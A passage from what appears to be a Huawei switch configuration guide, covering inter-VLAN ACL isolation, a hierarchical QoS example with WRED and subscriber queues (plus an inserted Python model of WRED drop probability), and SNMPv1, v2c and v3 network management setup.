segment 192.168.3.0/24, that is, users in VLAN 10 cannot access users in VLAN 30.
# User devices on network segments 192.168.1.0/24, 192.168.2.0/24, and 192.168.3.0/24 can
ping the IP address 10.1.20.1/24 of the router interface, indicating that users of the
three departments can access the Internet.

----End

Configuration Files
- Configuration file of the Switch
#
sysname Switch
#
vlan batch 10 20 30 40
#
acl number 3000
rule 5 deny ip source 192.168.1.0 0.0.0.255 destination 192.168.3.0 0.0.0.255
rule 10 permit ip source 192.168.1.0 0.0.0.255 destination 192.168.2.0
0.0.0.255
rule 15 permit ip
#
traffic classifier c1 operator and precedence 5
if-match acl 3000
#
traffic behavior b1
permit
#
traffic policy p1 match-order config
classifier c1 behavior b1
#
interface Vlanif10
ip address 192.168.1.1 255.255.255.0
#
interface Vlanif20
ip address 192.168.2.1 255.255.255.0
#
interface Vlanif30
ip address 192.168.3.1 255.255.255.0
#
interface Vlanif40
ip address 10.1.20.2 255.255.255.0
#
interface GigabitEthernet1/0/1
port link-type trunk
port trunk allow-pass vlan 10 20 30
traffic-policy p1 inbound
#
interface GigabitEthernet1/0/2
port link-type access
port default vlan 40
#
ip route-static 0.0.0.0 0.0.0.0 10.1.20.1
#
return
- Configuration file of SwitchA
#
sysname SwitchA
#
vlan batch 10 20 30
#
interface GigabitEthernet1/0/1
port link-type access
port default vlan 10
#
interface GigabitEthernet1/0/2
port link-type access
port default vlan 20
#
interface GigabitEthernet1/0/3
port link-type access
port default vlan 30
#
interface GigabitEthernet1/0/4
port link-type trunk
port trunk allow-pass vlan 10 20 30
#
return

17.13 Example for Configuring HQoS

Overview of HQoS
HQoS uses multiple levels of queues to further differentiate service traffic, and provides
uniform management and hierarchical scheduling for transmission objects such as users and
services. HQoS enables network devices to control internal resources with the existing
hardware, providing QoS guarantee for advanced users while reducing network construction
cost.

The switch uses flow and subscriber queues to implement HQoS.

Configuration Notes
Only X1E series cards support this configuration.

Table 17-16 Applicable product models and versions

Product | Product Model     | Software Version
S12700  | S12708 and S12712 | V200R005C00, V200R006C00, V200R007C00, V200R007C20, V200R008C00, V200R009C00
        | S12704            | V200R008C00, V200R009C00

NOTE
To know details about software mappings, see Switch Software Mapping Search.

Networking Requirements
Voice, video, and data services from multiple users are transmitted on an enterprise campus
network, and 802.1p priorities of voice, video, and data services are 6, 5, and 2 respectively.
Bandwidth needs to be guaranteed for the voice, video, and data services in descending order
of priority. Table 17-17 and Table 17-18 describe the configuration requirements.

Because the bandwidth is finite, the device needs to differentiate service priorities and shape
traffic from different users to provide different bandwidth. Table 17-19 describes the
configuration requirement.

Table 17-17 Congestion avoidance parameters of flow queues

Service Type | Color  | Lower Drop Threshold (%) | Upper Drop Threshold (%) | Maximum Drop Probability (%)
Voice        | Green  | 80                       | 100                      | 10
Video        | Yellow | 60                       | 80                       | 20
Data         | Red    | 40                       | 60                       | 40

Table 17-18 Congestion management parameters of flow queues

Service Type CoS Value

Voice EF

Video AF3

Data AF1

Table 17-19 Traffic shaping parameters of subscriber queues

User PIR

Users in VLAN 10 8000 kbit/s

Users in VLAN 20 5000 kbit/s

Figure 17-13 HQoS networking

[Figure: User 1 and User 2 (VLAN 10) connect to SwitchA GE1/0/1 and GE1/0/2; User 3 and User 4 (VLAN 20) connect to SwitchB GE1/0/1 and GE1/0/2; SwitchA GE2/0/1 and SwitchB GE2/0/1 connect to Switch GE1/0/1 and GE1/0/2; Switch GE2/0/1 connects to SwitchC GE1/0/1, and SwitchC GE2/0/1 connects to the Router and the Internet. Video, data, and voice traffic flows from the users toward the Internet.]

Configuration Roadmap
The configuration roadmap is as follows:
1. Create VLANs and configure interfaces so that the enterprise can access the Internet
through the Switch.
2. Create a DiffServ domain on the Switch to map 802.1p priorities of different service
packets to PHBs and colors, and bind the DiffServ domain to the inbound interface of the
Switch.
3. Configure a flow queue WRED drop profile, flow queue profile, and profile parameters
on the Switch so that the Switch provides different scheduling priorities, drop profile
parameters, and traffic shaping parameters for different services.
4. Configure ACLs on the Switch to differentiate service traffic of different users based on
VLAN IDs.
5. Configure subscriber queues and traffic shaping parameters on the Switch, and reference
the flow queue WRED drop profile and flow queue profile to implement HQoS.

Procedure
Step 1 Create VLANs and configure interfaces.
# Create VLAN 10 on SwitchA, configure GE1/0/1 and GE1/0/2 as access interfaces and add
them to VLAN 10, and configure GE2/0/1 as a trunk interface and add it to VLAN 10.
<HUAWEI> system-view
[HUAWEI] sysname SwitchA
[SwitchA] vlan batch 10
[SwitchA] interface gigabitethernet 1/0/1
[SwitchA-GigabitEthernet1/0/1] port link-type access
[SwitchA-GigabitEthernet1/0/1] port default vlan 10
[SwitchA-GigabitEthernet1/0/1] quit
[SwitchA] interface gigabitethernet 1/0/2
[SwitchA-GigabitEthernet1/0/2] port link-type access
[SwitchA-GigabitEthernet1/0/2] port default vlan 10
[SwitchA-GigabitEthernet1/0/2] quit
[SwitchA] interface gigabitethernet 2/0/1
[SwitchA-GigabitEthernet2/0/1] port link-type trunk
[SwitchA-GigabitEthernet2/0/1] port trunk allow-pass vlan 10
[SwitchA-GigabitEthernet2/0/1] quit

# Create VLAN 20 on SwitchB, configure GE1/0/1 and GE1/0/2 as access interfaces and add
them to VLAN 20, and configure GE2/0/1 as a trunk interface and add it to VLAN 20.
<HUAWEI> system-view
[HUAWEI] sysname SwitchB
[SwitchB] vlan batch 20
[SwitchB] interface gigabitethernet 1/0/1
[SwitchB-GigabitEthernet1/0/1] port link-type access
[SwitchB-GigabitEthernet1/0/1] port default vlan 20
[SwitchB-GigabitEthernet1/0/1] quit
[SwitchB] interface gigabitethernet 1/0/2
[SwitchB-GigabitEthernet1/0/2] port link-type access
[SwitchB-GigabitEthernet1/0/2] port default vlan 20
[SwitchB-GigabitEthernet1/0/2] quit
[SwitchB] interface gigabitethernet 2/0/1
[SwitchB-GigabitEthernet2/0/1] port link-type trunk
[SwitchB-GigabitEthernet2/0/1] port trunk allow-pass vlan 20
[SwitchB-GigabitEthernet2/0/1] quit

# Create VLAN 10 and VLAN 20 on SwitchC, configure GE1/0/1 as a trunk interface and add
it to VLAN 10 and VLAN 20, and configure GE2/0/1 as a trunk interface and add it to VLAN
10 and VLAN 20.
<HUAWEI> system-view
[HUAWEI] sysname SwitchC
[SwitchC] vlan batch 10 20
[SwitchC] interface gigabitethernet 1/0/1
[SwitchC-GigabitEthernet1/0/1] port link-type trunk
[SwitchC-GigabitEthernet1/0/1] port trunk allow-pass vlan 10 20
[SwitchC-GigabitEthernet1/0/1] quit
[SwitchC] interface gigabitethernet 2/0/1
[SwitchC-GigabitEthernet2/0/1] port link-type trunk
[SwitchC-GigabitEthernet2/0/1] port trunk allow-pass vlan 10 20
[SwitchC-GigabitEthernet2/0/1] quit

# Create VLAN 10 and VLAN 20 on the Switch, configure GE1/0/1, GE1/0/2, and GE2/0/1
as trunk interfaces, and add GE1/0/1 to VLAN 10, GE1/0/2 to VLAN 20, and GE2/0/1 to
VLAN 10 and VLAN 20.
<HUAWEI> system-view
[HUAWEI] sysname Switch
[Switch] vlan batch 10 20
[Switch] interface gigabitethernet 1/0/1
[Switch-GigabitEthernet1/0/1] port link-type trunk
[Switch-GigabitEthernet1/0/1] port trunk allow-pass vlan 10
[Switch-GigabitEthernet1/0/1] quit
[Switch] interface gigabitethernet 1/0/2
[Switch-GigabitEthernet1/0/2] port link-type trunk
[Switch-GigabitEthernet1/0/2] port trunk allow-pass vlan 20
[Switch-GigabitEthernet1/0/2] quit
[Switch] interface gigabitethernet 2/0/1
[Switch-GigabitEthernet2/0/1] port link-type trunk
[Switch-GigabitEthernet2/0/1] port trunk allow-pass vlan 10 20
[Switch-GigabitEthernet2/0/1] quit

Step 2 Configure priority mapping.


# Create a DiffServ domain ds1 to map 802.1p priorities 6, 5, and 2 to the PHBs EF, AF3, and
AF1 and to color the packets green, yellow, and red, respectively.
[Switch] diffserv domain ds1
[Switch-dsdomain-ds1] 8021p-inbound 6 phb ef green //Create a DiffServ domain to
map 802.1p priorities of different service packets to PHBs so that packets enter
different queues.
[Switch-dsdomain-ds1] 8021p-inbound 5 phb af3 yellow
[Switch-dsdomain-ds1] 8021p-inbound 2 phb af1 red
[Switch-dsdomain-ds1] quit

# Bind the DiffServ domain to GE1/0/1 and GE1/0/2 on the Switch.


[Switch] interface gigabitethernet 1/0/1
[Switch-GigabitEthernet1/0/1] trust upstream ds1 //Apply the DiffServ domain to
the interface.
[Switch-GigabitEthernet1/0/1] trust 8021p inner //Configure the interface to
trust 802.1p priorities.
[Switch-GigabitEthernet1/0/1] quit
[Switch] interface gigabitethernet 1/0/2
[Switch-GigabitEthernet1/0/2] trust upstream ds1 //Apply the DiffServ domain to
the interface.
[Switch-GigabitEthernet1/0/2] trust 8021p inner //Configure the interface to
trust 802.1p priorities.
[Switch-GigabitEthernet1/0/2] quit

Step 3 Configure a flow queue WRED drop profile and define parameters in the profile.
# Create a flow queue WRED drop profile named wred1 on the Switch and set parameters of
green, yellow, and red packets in the flow queue WRED drop profile.
[Switch] flow-wred-profile wred1 //Configure a WRED drop profile.
[Switch-flow-wred-wred1] color green low-limit 80 high-limit 100 discard-percentage 10 //Set the lower and upper drop thresholds and the maximum drop probability for green packets.
[Switch-flow-wred-wred1] color yellow low-limit 60 high-limit 80 discard-percentage 20 //When the percentage of the yellow packet length to the queue length reaches 60%, the device starts to discard packets with the maximum drop probability of 20%. When the percentage reaches 80%, the device discards all new packets.
[Switch-flow-wred-wred1] color red low-limit 40 high-limit 60 discard-percentage 40
[Switch-flow-wred-wred1] quit
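The WRED behaviour that the wred1 profile configures, as an added Python example (not Huawei code). It assumes the standard WRED curve: no drops below low-limit, a linear ramp from 0 up to discard-percentage at high-limit, and tail drop from high-limit on, and it shows why red packets are discarded first at a given queue fill.

```python
"""WRED drop decision for the flow-wred-profile wred1 configured above.

Added example, not Huawei code. Assumes the standard WRED curve: no drops
while the queue fill is below low-limit, a linear ramp from 0 up to
discard-percentage as the fill approaches high-limit, and tail drop
(every new packet discarded) from high-limit on. Thresholds are
percentages of the queue depth, as on the switch.
"""
import random
from dataclasses import dataclass


@dataclass(frozen=True)
class ColorThreshold:
    low_limit: int           # fill (%) at which dropping starts
    high_limit: int          # fill (%) at which all new packets are dropped
    discard_percentage: int  # maximum drop probability (%) reached at high_limit


# Values taken from the wred1 profile in Step 3.
WRED1 = {
    "green": ColorThreshold(low_limit=80, high_limit=100, discard_percentage=10),
    "yellow": ColorThreshold(low_limit=60, high_limit=80, discard_percentage=20),
    "red": ColorThreshold(low_limit=40, high_limit=60, discard_percentage=40),
}


def drop_probability(profile: dict, color: str, fill_percent: float) -> float:
    """Probability (0.0 to 1.0) that a packet of `color` is dropped when the
    queue is `fill_percent` percent full."""
    t = profile[color]
    if fill_percent < t.low_limit:
        return 0.0
    if fill_percent >= t.high_limit:
        return 1.0
    ramp = (fill_percent - t.low_limit) / (t.high_limit - t.low_limit)
    return ramp * t.discard_percentage / 100.0


def drop_order(profile: dict) -> list:
    """Colors in the order WRED starts discarding them as the queue fills:
    the color with the lowest low-limit (red here) is hit first."""
    return sorted(profile, key=lambda c: profile[c].low_limit)


def simulate(profile: dict, color: str, fill_percent: float,
             packets: int = 10000, seed: int = 1) -> float:
    """Run the random admission decision `packets` times at a fixed fill and
    return the observed drop fraction (it approaches drop_probability)."""
    rng = random.Random(seed)
    p = drop_probability(profile, color, fill_percent)
    dropped = sum(1 for _ in range(packets) if rng.random() < p)
    return dropped / packets


if __name__ == "__main__":
    for fill in (30, 50, 70, 90, 100):
        probs = {c: round(drop_probability(WRED1, c, fill), 3) for c in WRED1}
        print(f"queue {fill:3d}% full -> drop probability {probs}")
```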

Step 4 Configure a flow queue profile and define parameters in the profile.
# Configure a flow queue profile named flow1 on the Switch, bind flow queue profile flow1
to flow queue WRED drop profile wred1, and configure different scheduling parameters.
[Switch] flow-queue-profile flow1 //Configure a flow queue profile.
[Switch-flow-queue-flow1] qos queue 5 pq flow-wred-profile wred1 //Configure PQ scheduling for queue 5 and reference the WRED drop profile wred1.
[Switch-flow-queue-flow1] qos queue 3 wfq weight 20 flow-wred-profile wred1 //Configure WFQ scheduling for queue 3, set the WFQ weight to 20, and reference the WRED drop profile wred1.
[Switch-flow-queue-flow1] qos queue 1 wfq weight 10 flow-wred-profile wred1 //Configure WFQ scheduling for queue 1, set the WFQ weight to 10, and reference the WRED drop profile wred1.
[Switch-flow-queue-flow1] quit

Step 5 Configure ACLs.


# Configure ACL 4001 and ACL 4002 on the Switch, and configure ACL rules based on
VLAN 10 and VLAN 20.
[Switch] acl number 4001
[Switch-acl-L2-4001] rule 1 permit vlan-id 10 //Configure an ACL rule to match packets with VLAN 10.
[Switch-acl-L2-4001] quit
[Switch] acl number 4002
[Switch-acl-L2-4002] rule 1 permit vlan-id 20 //Configure an ACL rule to match packets with VLAN 20.
[Switch-acl-L2-4002] quit

Step 6 Configure subscriber queues and parameters.

# Configure subscriber queues based on ACL 4001 and ACL 4002 on the Switch and
reference flow queue profile flow1.
[Switch] interface gigabitethernet 2/0/1
[Switch-GigabitEthernet2/0/1] traffic-user-queue outbound acl 4001 pir 8000 flow-queue-profile flow1 //Create a subscriber queue that references ACL 4001, set the PIR to 8000 kbit/s, and reference the flow queue profile flow1.
[Switch-GigabitEthernet2/0/1] traffic-user-queue outbound acl 4002 pir 5000 flow-queue-profile flow1 //Create a subscriber queue that references ACL 4002, set the PIR to 5000 kbit/s, and reference the flow queue profile flow1.
[Switch-GigabitEthernet2/0/1] quit
[Switch] quit

Step 7 Verify the configuration.

# Check the configuration of the WRED drop profile of a flow queue, including the profile
name, upper and lower drop thresholds of green, yellow, and red packets, and maximum drop
probability.
<Switch> display flow-wred-profile name wred1
Flow-wred-profile[1]: wred1
Queue depth : 1048576
Color Low-limit High-limit Discard-percentage
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Green 80 100 10
Yellow 60 80 20
Red 40 60 40
-----------------------------------------------------------------

# Check the flow queue profile configuration, including the profile name and WFQ weights.
<Switch> display flow-queue-profile name flow1
Flow-queue-profile[1]: flow1
Queue Schedule(Weight) Shaping flow-wred-profile
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
0 PQ None default
1 WFQ(10) None wred1
2 PQ None default
3 WFQ(20) None wred1
4 PQ None default
5 PQ None wred1
6 PQ None default
7 PQ None default
-----------------------------------------------------------------------

# Check traffic statistics on subscriber queues.


<Switch> display traffic-user-queue statistics interface gigabitethernet 2/0/1 outbound acl 4001
--------------------------------------------------------------------------------
Interface: GigabitEthernet2/0/1
--------------------------------------------------------------------------------
Queue ID | Statistics information
--------------------------------------------------------------------------------
0        | packets: pass: 4,127
         |          drop: 2,798,787,076
         | bytes:   pass: 610,796
         |          drop: 414,220,487,248
--------------------------------------------------------------------------------
1        | packets: pass: 4,127
         |          drop: 5,597,436,717
         | bytes:   pass: 610,796
         |          drop: 828,420,634,116
--------------------------------------------------------------------------------
2        | packets: pass: 0
         |          drop: 0
         | bytes:   pass: 0
         |          drop: 0
--------------------------------------------------------------------------------
3        | packets: pass: 4,127
         |          drop: 5,597,436,713
         | bytes:   pass: 610,796
         |          drop: 828,420,633,524
--------------------------------------------------------------------------------
4        | packets: pass: 4,127
         |          drop: 2,798,716,293
         | bytes:   pass: 610,796
         |          drop: 414,210,011,364
--------------------------------------------------------------------------------
5        | packets: pass: 4,127
         |          drop: 2,798,716,294
         | bytes:   pass: 610,796
         |          drop: 414,210,011,512
--------------------------------------------------------------------------------
6        | packets: pass: 0
         |          drop: 0
         | bytes:   pass: 0
         |          drop: 0
--------------------------------------------------------------------------------
7        | packets: pass: 1,119,509,460
         |          drop: 1,679,210,961
         | bytes:   pass: 165,687,400,080
         |          drop: 248,523,222,228
--------------------------------------------------------------------------------

<Switch> display traffic-user-queue statistics interface gigabitethernet 2/0/1 outbound acl 4002
--------------------------------------------------------------------------------
Interface: GigabitEthernet2/0/1
--------------------------------------------------------------------------------
Queue ID | Statistics information
--------------------------------------------------------------------------------
0        | packets: pass: 4,125
         |          drop: 5,218,026
         | bytes:   pass: 610,500
         |          drop: 772,267,848
--------------------------------------------------------------------------------
1        | packets: pass: 4,125
         |          drop: 10,440,178
         | bytes:   pass: 610,500
         |          drop: 1,545,146,344
--------------------------------------------------------------------------------
2        | packets: pass: 0
         |          drop: 0
         | bytes:   pass: 0
         |          drop: 0
--------------------------------------------------------------------------------
3        | packets: pass: 4,125
         |          drop: 10,440,178
         | bytes:   pass: 610,500
         |          drop: 1,545,146,344
--------------------------------------------------------------------------------
4        | packets: pass: 4,125
         |          drop: 5,218,027
         | bytes:   pass: 610,500
         |          drop: 772,267,996
--------------------------------------------------------------------------------
5        | packets: pass: 4,125
         |          drop: 5,218,027
         | bytes:   pass: 610,500
         |          drop: 772,267,996
--------------------------------------------------------------------------------
6        | packets: pass: 0
         |          drop: 0
         | bytes:   pass: 0
         |          drop: 0
--------------------------------------------------------------------------------
7        | packets: pass: 2,092,988
         |          drop: 3,129,165
         | bytes:   pass: 309,762,224
         |          drop: 463,116,420
--------------------------------------------------------------------------------

----End

Configuration Files
l Configuration file of SwitchA
#
sysname SwitchA
#
vlan batch 10
#
interface GigabitEthernet1/0/1
port link-type access
port default vlan 10
#
interface GigabitEthernet1/0/2
port link-type access
port default vlan 10
#
interface GigabitEthernet2/0/1
port link-type trunk
port trunk allow-pass vlan 10
#
return

l Configuration file of SwitchB
#
sysname SwitchB
#
vlan batch 20
#
interface GigabitEthernet1/0/1
port link-type access
port default vlan 20
#
interface GigabitEthernet1/0/2
port link-type access
port default vlan 20
#
interface GigabitEthernet2/0/1
port link-type trunk
port trunk allow-pass vlan 20
#
return

l Configuration file of SwitchC
#
sysname SwitchC
#
vlan batch 10 20
#
interface GigabitEthernet1/0/1
port link-type trunk
port trunk allow-pass vlan 10 20
#
interface GigabitEthernet2/0/1
port link-type trunk
port trunk allow-pass vlan 10 20
#
return

l Configuration file of the Switch
#
sysname Switch
#
vlan batch 10 20
#
diffserv domain ds1
8021p-inbound 2 phb af1 red
8021p-inbound 5 phb af3 yellow
8021p-inbound 6 phb ef green
#
acl number 4001
rule 1 permit vlan-id 10
acl number 4002
rule 1 permit vlan-id 20
#
flow-wred-profile wred1
color green low-limit 80 high-limit 100 discard-percentage 10
color yellow low-limit 60 high-limit 80 discard-percentage 20
color red low-limit 40 high-limit 60 discard-percentage 40
#
flow-queue-profile flow1
qos queue 1 wfq weight 10 flow-wred-profile wred1
qos queue 3 wfq weight 20 flow-wred-profile wred1
qos queue 5 flow-wred-profile wred1
#
interface GigabitEthernet1/0/1
port link-type trunk
port trunk allow-pass vlan 10
trust upstream ds1
trust 8021p inner
#
interface GigabitEthernet1/0/2
port link-type trunk
port trunk allow-pass vlan 20
trust upstream ds1
trust 8021p inner
#
interface GigabitEthernet2/0/1
port link-type trunk
port trunk allow-pass vlan 10 20
traffic-user-queue outbound acl 4001 pir 8000 flow-queue-profile flow1
traffic-user-queue outbound acl 4002 pir 5000 flow-queue-profile flow1
#
return

18 Typical Network Management and Monitoring Configuration

About This Chapter

18.1 Typical SNMP Configuration


18.2 Typical NetStream Configuration
18.3 Typical Mirroring Configuration
18.4 Typical iPCA Configuration


18.1 Typical SNMP Configuration


18.1.1 Example for Configuring a Device to Communicate with the NMS Using SNMPv1
SNMP Overview
The Simple Network Management Protocol (SNMP) is a standard network management
protocol widely used on TCP/IP networks. SNMP uses a central computer (a network
management station) that runs network management software to manage network elements.
SNMP has the following advantages:
l Automatic configuration management: A network administrator can use SNMP to
quickly query information, modify data, locate faults, and so forth on any SNMP agent.
SNMP greatly improves work efficiency of network administrators.
l Multi-vendor management: SNMP shields the physical differences between devices of
different vendors. SNMP provides only a basic function set, so the managed tasks are
separated from the managed physical features and lower-layer interconnection
technologies. Therefore, SNMP can uniformly manage devices of different vendors.
SNMP is available in three versions. SNMPv1 is the initial version of SNMP. It provides
authentication based on community names. SNMPv1 has a low security level, and can return
only a few error codes. SNMPv2c issued by IETF is the second release of SNMP. SNMPv2c
has enhancements to standard error codes, data types (Counter 64 and Counter 32), and
operations including GetBulk and Inform. SNMPv2c does not improve the security, so IETF
issued SNMPv3 that provides User Security Module (USM)-based authentication and
encryption and View-based Access Control Model (VACM)-based access control.
SNMPv1 is applicable to small networks with simple networking and low security
requirements or small networks with good security and stability, such as campus networks and
small enterprise networks.

Configuration Notes
This example applies to all versions and models.

Networking Requirements
As shown in Figure 18-1, the NMS server manages all devices on the network. The network
is small and not likely to be attacked, so SNMPv1 is configured on switches to communicate
with the NMS server. A new switch is added to the network. The network administrator wants
to utilize the existing network resources to manage the new switch and quickly locate as well
as rectify network faults.

Figure 18-1 Configuring a device to communicate with the NMS using SNMPv1 (NMS at 10.1.1.1/24, connected to GE1/0/1 of the Switch in VLAN10, 10.1.1.2/24)


Configuration Roadmap
The configuration roadmap is as follows:
1. Configure SNMPv1 on the switch so that the NMS running SNMPv1 can manage the
switch.
2. Configure access control so that only the NMS with the specified IP address can perform
read/write operations on the specified MIB objects of the switch.
3. Configure a community name based on which the switch permits access of the NMS.
4. Configure a trap host and enable the switch to automatically send traps to the NMS.
5. Add the switch to the NMS. The community name configured on the switch must be the
same as that used by the NMS; otherwise, the NMS cannot manage the switch.

Procedure
Step 1 Configure SNMPv1 on the switch so that the NMS running SNMPv1 can manage the switch.
<HUAWEI> system-view
[HUAWEI] sysname Switch
[Switch] snmp-agent sys-info version v1 //By default, SNMPv3 is supported.

Step 2 Configure access control so that only the NMS with the specified IP address can perform
read/write operations on the specified MIB objects of the switch.
# Configure an ACL to permit only the NMS 10.1.1.1 to access the switch.
[Switch] acl 2001
[Switch-acl-basic-2001] rule permit source 10.1.1.1 0 //Allow only the NMS with IP address 10.1.1.1 to access the device.
[Switch-acl-basic-2001] rule deny
[Switch-acl-basic-2001] quit

# Configure the MIB view to specify the MIB objects that can be accessed by the NMS.
[Switch] snmp-agent mib-view included isoview iso //Specify that the accessible MIB view contains iso.

Step 3 Configure a community name based on which the switch permits access of the NMS.
[Switch] snmp-agent community write adminnms01 mib-view isoview acl 2001 //Configure a community name and apply the ACL to make the access control function take effect.

Step 4 Configure a trap host and enable the switch to automatically send traps to the NMS.
[Switch] snmp-agent trap enable
Warning: All switches of SNMP trap/notification will be open. Continue? [Y/N]:y //Enable all trap functions on the switch. By default, only some trap functions are enabled. You can run the display snmp-agent trap all command to check trap status.
[Switch] snmp-agent target-host trap address udp-domain 10.1.1.1 params securityname adminnms01 v1 //Configure a trap host. By default, traps are sent by UDP port 162.

Step 5 Add the switch to the NMS.


Configure the SNMP function on the NMS according to the NMS manual, including setting
the SNMP version to SNMPv1, the read/write community name to adminnms01, and the
SNMP connection port number to 161 (default port used by the switch). In addition, set the
trap receiving port to port 162 (default port used by the switch) so that the NMS can receive
traps.
After the configurations are complete, the NMS can manage the switch and the switch can
automatically send traps to the NMS when events occur.


NOTE

The parameter settings on the NMS must be the same as those on the switch; otherwise, the NMS cannot
manage the switch.

----End

Configuration Files
Configuration file of the switch
#
sysname Switch
#
acl number 2001
rule 5 permit source 10.1.1.1 0
rule 10 deny
#
snmp-agent
snmp-agent local-engineid 800007DB03360102101100
snmp-agent community write cipher %^%#.T|&Whvyf$<Gd"I,wXi5SP_6~Nakk6<<+3H:N-h@aJ6d,l0md%HCeAY8~>X=>xV\JKNAL=124r839v<*%^%# mib-view isoview acl 2001
snmp-agent sys-info version v1 v3
snmp-agent target-host trap address udp-domain 10.1.1.1 params securityname cipher %^%#uq/!YZfvW4*vf[~C|.:Cl}UqS(vXd#wwqR~5M(rU%%^%#
snmp-agent mib-view included isoview iso
snmp-agent trap enable
#
return

18.1.2 Example for Configuring a Device to Communicate with the NMS Using SNMPv2c
SNMP Overview
The Simple Network Management Protocol (SNMP) is a standard network management
protocol widely used on TCP/IP networks. SNMP uses a central computer (a network
management station) that runs network management software to manage network elements.
SNMP has the following advantages:
l Automatic configuration management: A network administrator can use SNMP to
quickly query information, modify data, locate faults, and so forth on any SNMP agent.
SNMP greatly improves work efficiency of network administrators.
l Multi-vendor management: SNMP shields the physical differences between devices of
different vendors. SNMP provides only a basic function set, so the managed tasks are
separated from the managed physical features and lower-layer interconnection
technologies. Therefore, SNMP can uniformly manage devices of different vendors.
SNMP is available in three versions. SNMPv1 is the initial version of SNMP. It provides
authentication based on community names. SNMPv1 has a low security level, and can return
only a few error codes. SNMPv2c issued by IETF is the second release of SNMP. SNMPv2c
has enhancements to standard error codes, data types (Counter 64 and Counter 32), and
operations including GetBulk and Inform. SNMPv2c does not improve the security, so IETF
issued SNMPv3 that provides User Security Module (USM)-based authentication and
encryption and View-based Access Control Model (VACM)-based access control.
SNMPv2c is applicable to medium and large networks with low security requirements or with
good security (for example, VPNs) but on which services are so busy that traffic congestion
may occur.


Configuration Notes
This example applies to all versions and models.

Networking Requirements
As shown in Figure 18-2, the NMS server manages all devices on the network. The network
is large and secure but the service traffic volume on the network is high. Therefore, devices on
the network use SNMPv2c to communicate with the NMS server. For capacity expansion, a
new switch is added to the network. The network administrator wants to utilize the existing
network resources to manage the new switch and quickly locate as well as rectify network
faults.

Figure 18-2 Configuring a device to communicate with the NMS using SNMPv2c (NMS at 10.1.1.1/24, connected to GE1/0/1 of the Switch in VLAN10, 10.1.1.2/24)

Configuration Roadmap
The configuration roadmap is as follows:
1. Configure SNMPv2c on the switch so that the NMS running SNMPv2c can manage the
switch.
2. Configure access control so that only the NMS with the specified IP address can perform
read/write operations on the specified MIB objects of the switch.
3. Configure a community name based on which the switch permits access of the NMS.
4. Configure a trap host and enable the switch to automatically send traps to the NMS.
5. Add the switch to the NMS. The community name configured on the switch must be the
same as that used by the NMS; otherwise, the NMS cannot manage the switch.

Procedure
Step 1 Configure SNMPv2c on the switch so that the NMS running SNMPv2c can manage the
switch.
<HUAWEI> system-view
[HUAWEI] sysname Switch
[Switch] snmp-agent sys-info version v2c //By default, SNMPv3 is supported.

Step 2 Configure access control so that only the NMS with the specified IP address can perform
read/write operations on the specified MIB objects of the switch.
# Configure an ACL to permit only the NMS 10.1.1.1 to access the switch.
[Switch] acl 2001
[Switch-acl-basic-2001] rule permit source 10.1.1.1 0 //Allow only the NMS with IP address 10.1.1.1 to access the device.
[Switch-acl-basic-2001] rule deny
[Switch-acl-basic-2001] quit

# Configure the MIB view to specify the MIB objects that can be accessed by the NMS.
[Switch] snmp-agent mib-view included isoview iso //Specify that the accessible MIB view contains iso.

Step 3 Configure a community name based on which the switch permits access of the NMS.
[Switch] snmp-agent community write adminnms01 mib-view isoview acl 2001 //Configure a community name and apply the ACL to make the access control function take effect.

Step 4 Configure a trap host and enable the switch to automatically send traps to the NMS.
[Switch] snmp-agent trap enable
Warning: All switches of SNMP trap/notification will be open. Continue? [Y/N]:y //Enable all trap functions on the switch. By default, only some trap functions are enabled. You can run the display snmp-agent trap all command to check trap status.
[Switch] snmp-agent target-host trap address udp-domain 10.1.1.1 params securityname adminnms01 v2c //Configure a trap host. By default, traps are sent by UDP port 162.

Step 5 Add the switch to the NMS.


Configure the SNMP function on the NMS according to the NMS manual, including setting
the SNMP version to SNMPv2c, the read/write community name to adminnms01, and the
SNMP connection port number to 161 (default port used by the switch). In addition, set the
trap receiving port to port 162 (default port used by the switch) so that the NMS can receive
traps.
After the configurations are complete, the NMS can manage the switch and the switch can
automatically send traps to the NMS when events occur.

NOTE

The parameter settings on the NMS must be the same as those on the switch; otherwise, the NMS cannot
manage the switch.

----End

Configuration Files
Configuration file of the switch
#
sysname Switch
#
acl number 2001
rule 5 permit source 10.1.1.1 0
rule 10 deny
#
snmp-agent
snmp-agent local-engineid 800007DB03360102101100
snmp-agent community write cipher %^%#.T|&Whvyf$<Gd"I,wXi5SP_6~Nakk6<<+3H:N-h@aJ6d,l0md%HCeAY8~>X=>xV\JKNAL=124r839v<*%^%# mib-view isoview acl 2001
snmp-agent sys-info version v2c v3
snmp-agent target-host trap address udp-domain 10.1.1.1 params securityname cipher %^%#uq/!YZfvW4*vf[~C|.:Cl}UqS(vXd#wwqR~5M(rU%%^%# v2c
snmp-agent mib-view included isoview iso
snmp-agent trap enable
#
return


18.1.3 Example for Configuring a Device to Communicate with the NMS Using SNMPv3

SNMP Overview
The Simple Network Management Protocol (SNMP) is a standard network management
protocol widely used on TCP/IP networks. SNMP uses a central computer (a network
management station) that runs network management software to manage network elements.

SNMP has the following advantages:

l Automatic configuration management: A network administrator can use SNMP to
quickly query information, modify data, locate faults, and so forth on any SNMP agent.
SNMP greatly improves work efficiency of network administrators.
l Multi-vendor management: SNMP shields the physical differences between devices of
different vendors. SNMP provides only a basic function set, so the managed tasks are
separated from the managed physical features and lower-layer interconnection
technologies. Therefore, SNMP can uniformly manage devices of different vendors.

SNMP is available in three versions. SNMPv1 is the initial version of SNMP. It provides
authentication based on community names. SNMPv1 has a low security level, and can return
only a few error codes. SNMPv2c issued by IETF is the second release of SNMP. SNMPv2c
has enhancements to standard error codes, data types (Counter 64 and Counter 32), and
operations including GetBulk and Inform. SNMPv2c does not improve the security, so IETF
issued SNMPv3 that provides User Security Module (USM)-based authentication and
encryption and View-based Access Control Model (VACM)-based access control.

SNMPv3 is applicable to networks of various scales, especially networks that have strict
security requirements and can be managed only by authorized network administrators. For
example, SNMPv3 can be used if data between the NMS and managed device needs to be
transmitted over a public network.

Configuration Notes
This example applies to all versions and models.

Networking Requirements
As shown in Figure 18-3, the NMS server manages all devices on the network. The network
is large and is likely to be attacked. Therefore, devices on the network use SNMPv3 to
communicate with the NMS server. A new switch is added to the network. The network
administrator wants to utilize the existing network resources to manage the new switch and
quickly locate as well as rectify network faults.

